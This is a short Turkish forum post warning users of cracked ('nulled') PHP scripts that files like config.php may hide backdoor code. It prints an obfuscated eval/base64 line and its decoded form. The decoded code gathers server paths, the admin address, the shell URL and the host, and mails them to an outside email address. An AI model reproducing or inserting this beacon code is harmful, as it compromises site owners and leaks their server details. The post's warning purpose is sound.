Selam arkadaşlar,
Null kuran arkadaşlarımız ve ya null kullanan arkadaşlarımız bu konuyu okumasında yarar var.
Şimdi config.php gibi dosyalarda bu tür gizli komut gömülü
Kaynak : SPHZT
<?php eval("?>".base64_decode("PD9waHANCiRraW1lPSJ2YnR1cmthbUBnbWFpbC5jb20iOw0KJGJhc2xpaz0iRUxfTXVIYU1NZUQgU2VydmVyIEF2Y2lzaSBWMS4wIjsNCiRFTF9NdUhhTU1lRD0iRG9zeWEgWW9sdSA6ICIuJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4icm4iOw0KJEVMX011SGFNTWVELj0iU2VydmVyIEFkbWluIDogIi4kX1NFUlZFUlsnU0VSVkVSX0FETUlOJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBpc2xldGltIHNpc3RlbWkgOiAiLiRfU0VSVkVSWydTRVJWRVJfU09GVFdBUkUnXS4icm4iOw0KJEVMX011SGFNTWVELj0iU2hlbGwgTGluayA6IGh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydQSFBfU0VMRiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJBdmxhbmFuIFNpdGUgOiAiIC4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uInJuIjsNCm1haWwoJGtpbWUsICRiYXNsaWssICRFTF9NdUhhTU1lRCk7DQo/Pg==")); ?>Açmak gerekirse,
<?php
$kime="vbturkam@gmail.com";
$baslik="EL_MuHaMMeD Server Avcisi V1.0";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";
mail($kime, $baslik, $EL_MuHaMMeD);
Null kurdurtucaksanız, internetten bulma değil KİŞİNİN KENDİ KIRDIĞI NULL dosyaları kurdurtmanızı tercih ederim..
(Telefondan kopyala yapıştır yaptım ana kodda eksik olabilir, siz yinede anladınız, yazım hatalarım için özür dilerim mobilden açtım konuyu)